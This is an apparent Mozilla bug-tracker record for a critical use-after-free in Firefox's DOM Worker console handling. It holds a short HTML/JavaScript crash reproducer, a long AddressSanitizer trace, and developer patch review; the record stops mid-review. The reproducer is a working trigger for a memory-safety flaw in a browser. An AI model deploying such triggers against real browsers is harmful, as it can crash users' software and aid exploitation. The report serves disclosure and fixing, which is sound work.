Closed Bug 1155546 Opened 6 years ago Closed 6 years ago

Use After Free of ConsoleRunnable

Categories

(Core :: DOM: Workers, defect)

40 Branch
x86_64
Linux
defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla40
Tracking Status
firefox39 --- unaffected
firefox40 --- fixed
firefox-esr31 --- unaffected
firefox-esr38 --- unaffected
b2g-v2.0 --- unaffected
b2g-v2.0M --- unaffected
b2g-v2.1 --- unaffected
b2g-v2.1S --- unaffected
b2g-v2.2 --- unaffected

People

(Reporter: loobenyang, Assigned: baku)

References

Details

(Keywords: csectype-uaf, sec-critical)

Attachments

(3 files, 5 obsolete files)

Close the worker right after a console.log() call can trigger a Use After Free in WorkerPrivate::NotifyFeatures.

Firefox Version: 40.0a1 (2015-04-16)
Operating System: Ubuntu 14.04 LTS 64bit

Reproduction test case (uaf_ConsoleRunnable.html): 

<html><body></body>
<script type="text/javascript">
var blob = new Blob(['console.log("AAAA");close();'],{type: "text/javascript"});
var worker = new Worker(window.URL.createObjectURL(blob));
setTimeout(function(){location.reload()},300);
</script></html>


Open uaf_ConsoleRunnable.html in Firefox asan build, Asan reports a Use After Free:


=================================================================
==5060==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b0000aa228 at pc 0x7fd283026020 bp 0x7fd259a8d930 sp 0x7fd259a8d928
READ of size 8 at 0x60b0000aa228 thread T22 (DOM Worker)
    #0 0x7fd28302601f in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5930
    #1 0x7fd2830212c8 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6394
    #2 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #3 0x7fd283020e15 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5731
    #4 0x7fd28301ebcc in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5137
    #5 0x7fd282fc9c72 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2790
    #6 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #7 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #8 0x7fd27eaa33c8 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:368
    #9 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #10 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #11 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #12 0x7fd27e1e5ad8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:364
    #13 0x7fd28a760135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #14 0x7fd28ada0181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #15 0x7fd27be0b30c (/lib/x86_64-linux-gnu/libc.so.6+0xfb30c)

0x60b0000aa228 is located 24 bytes inside of 112-byte region [0x60b0000aa210,0x60b0000aa280)
freed by thread T22 (DOM Worker) here:
    #0 0x474a01 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7fd27e249bcc in nsRunnable::Release() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:32
    #2 0x7fd2801985e7 in ~nsRefPtr /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/base/../../dist/include/nsRefPtr.h:60
    #3 0x7fd2801985e7 in ~ConsoleReleaseRunnable /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:361
    #4 0x7fd2801985e7 in mozilla::dom::ConsoleRunnable::PostDispatch()::ConsoleReleaseRunnable::~ConsoleReleaseRunnable() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:361
    #5 0x7fd28304121c in Release /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:250
    #6 0x7fd28304121c in mozilla::dom::workers::WorkerControlRunnable::Release() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:529
    #7 0x7fd283020e50 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5735
    #8 0x7fd2830228f8 in ProcessAllControlRunnables /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1291
    #9 0x7fd2830228f8 in mozilla::dom::workers::WorkerPrivate::OnProcessNextEvent(unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5265
    #10 0x7fd28304a2a5 in mozilla::dom::workers::WorkerThread::Observer::OnProcessNextEvent(nsIThreadInternal*, bool, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerThread.cpp:322
    #11 0x7fd27e1e8cb0 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:838
    #12 0x7fd27e24aafe in NS_ProcessPendingEvents(nsIThread*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:207
    #13 0x7fd28302130d in ClearMainEventQueue /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5760
    #14 0x7fd28302130d in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6399
    #15 0x7fd28161d9aa in mozilla::dom::WorkerGlobalScopeBinding_workers::close(JSContext*, JS::Handle<JSObject*>, mozilla::dom::workers::WorkerGlobalScope*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerGlobalScopeBinding.cpp:144
    #16 0x7fd28161636c in mozilla::dom::WorkerGlobalScopeBinding_workers::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerGlobalScopeBinding.cpp:1139
    #17 0x7fd2864cc0de in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #18 0x7fd2864cc0de in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:720
    #19 0x7fd28650bd2e in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2956
    #20 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #21 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #22 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #23 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #24 0x7fd282fbf411 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1590
    #25 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #26 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #27 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #28 0x7fd283028b07 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6060
    #29 0x7fd282faba62 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1417
    #30 0x7fd282faba62 in (anonymous namespace)::LoadAllScripts(JSContext*, mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1671
    #31 0x7fd282fab4b5 in mozilla::dom::workers::scriptloader::LoadMainScript(JSContext*, nsAString_internal const&, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1766
    #32 0x7fd283083e63 in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:1070
    #33 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #34 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #35 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #36 0x7fd28301f0f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5229

previously allocated by thread T22 (DOM Worker) here:
    #0 0x474c01 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x4921cd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7fd28014e719 in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/base/../../dist/include/mozilla/mozalloc.h:187
    #3 0x7fd28014e719 in mozilla::dom::Console::Method(JSContext*, mozilla::dom::Console::MethodName, nsAString_internal const&, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:1142
    #4 0x7fd28014cca2 in mozilla::dom::Console::Log(JSContext*, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:799
    #5 0x7fd2812c5d5c in mozilla::dom::ConsoleBinding::log(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Console*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./ConsoleBinding.cpp:2018
    #6 0x7fd281eb456f in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2578
    #7 0x7fd2864cc0de in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #8 0x7fd2864cc0de in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:720
    #9 0x7fd28650bd2e in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2956
    #10 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #11 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #12 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #13 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #14 0x7fd282fbf411 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1590
    #15 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #16 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #17 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #18 0x7fd283028b07 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6060
    #19 0x7fd282faba62 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1417
    #20 0x7fd282faba62 in (anonymous namespace)::LoadAllScripts(JSContext*, mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1671
    #21 0x7fd282fab4b5 in mozilla::dom::workers::scriptloader::LoadMainScript(JSContext*, nsAString_internal const&, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1766
    #22 0x7fd283083e63 in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:1070
    #23 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #24 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #25 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #26 0x7fd28301f0f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5229
    #27 0x7fd282fc9c72 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2790
    #28 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #29 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #30 0x7fd27eaa33c8 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:368
    #31 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #32 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #33 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #34 0x7fd27e1e5ad8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:364

Thread T22 (DOM Worker) created by T0 (Web Content) here:
    #0 0x461475 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7fd28a75cabd in _PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7fd28a75c63a in PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7fd27e1e6e3b in nsThread::Init() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:478
    #4 0x7fd283049c2a in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerThread.cpp:90
    #5 0x7fd282f9f676 in mozilla::dom::workers::RuntimeService::ScheduleWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1750
    #6 0x7fd282f9cda4 in mozilla::dom::workers::RuntimeService::RegisterWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1604
    #7 0x7fd28301daf9 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString_internal const&, bool, mozilla::dom::WorkerType, nsACString_internal const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4803
    #8 0x7fd28301d3f6 in Constructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4738
    #9 0x7fd28301d3f6 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&, nsAString_internal const&, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4679
    #10 0x7fd28162279b in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerBinding.cpp:738
    #11 0x7fd28651bf9e in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #12 0x7fd28651bf9e in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:268
    #13 0x7fd28651bf9e in js::InvokeConstructor(JSContext*, JS::CallArgs) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:821
    #14 0x7fd28650bd22 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2953
    #15 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #16 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #17 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #18 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #19 0x7fd286f5eaaf in Evaluate /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4238
    #20 0x7fd286f5eaaf in JS::Evaluate(JSContext*, JS::AutoObjectVector&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4293
    #21 0x7fd2804c0d96 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:265
    #22 0x7fd2804c1c8b in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:337
    #23 0x7fd280541cfa in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:1148
    #24 0x7fd28053f421 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:978
    #25 0x7fd280538c63 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:767
    #26 0x7fd2805342ce in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptElement.cpp:140
    #27 0x7fd27f9a0e34 in operator-> /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsIScriptElement.h:220
    #28 0x7fd27f9a0e34 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:663
    #29 0x7fd27f99f321 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:488
    #30 0x7fd27f9a5ddb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:127
    #31 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #32 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #33 0x7fd27eaa23e9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:99
    #34 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #35 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #36 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #37 0x7fd2834a1bc7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:164
    #38 0x7fd285021fc2 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:738
    #39 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #40 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #41 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #42 0x7fd2850216de in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:575
    #43 0x48d292 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:236
    #44 0x7fd27bd31ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5930 mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status)
Shadow bytes around the buggy address:
  0x0c168000d3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d420: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c168000d430: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
=>0x0c168000d440: fa fa fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c168000d450: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c168000d460: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
  0x0c168000d470: 00 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa
  0x0c168000d480: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c168000d490: 06 fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:    ==5060==ABORTING
Using the same object as nsRunnable (which is refcounted) and as WorkerFeature which isn't refcounted looks rather error prone.
Blocks: 1154076
Assignee: nobody → amarchesini
Attached patch crash.patch (obsolete) — Splinter Review
Attachment #8593892 - Flags: review?(bugs)
Attached patch crash.patch (obsolete) — Splinter Review
Also ConsoleRunnable must check if leak or not mFeature.
Attachment #8593894 - Flags: review?(bugs)
Attachment #8593892 - Attachment is obsolete: true
Attachment #8593892 - Flags: review?(bugs)
Attached patch crash.patch (obsolete) — Splinter Review
forgot hg qref.
Attachment #8593894 - Attachment is obsolete: true
Attachment #8593894 - Flags: review?(bugs)
Attachment #8593895 - Flags: review?(bugs)
Comment on attachment 8593895 [details] [diff] [review]
crash.patch

Bent is better reviewer for this.

(I wish WorkerFeatures were refcounted and their handling safer, that might have saved us here.)
Attachment #8593895 - Flags: review?(bugs) → review?(bent.mozilla)
Comment on attachment 8593895 [details] [diff] [review]
crash.patch

Review of attachment 8593895 [details] [diff] [review]:
-----------------------------------------------------------------

The runnable+feature combo should be just fine. We are not looking at a failure to dispatch because the report clearly shows that the runnable made it back to the worker thread and then got deleted after its refcount dropped to 0, exactly as expected. So somehow we still end up with a garbage pointer in the feature list.

Looking closer it seems like WorkerControlRunnable doesn't have a special Cancel hook (that would make it always Run(), like expected). That's what needs to be fixed.
Attachment #8593895 - Flags: review?(bent.mozilla) → review-
Flags: sec-bounty?
Attached patch crash2.patch (obsolete) — Splinter Review
Attachment #8593895 - Attachment is obsolete: true
Attachment #8594072 - Flags: review?(bent.mozilla)
Comment on attachment 8594072 [details] [diff] [review]
crash2.patch

Review of attachment 8594072 [details] [diff] [review]:
-----------------------------------------------------------------

r=me with this change:

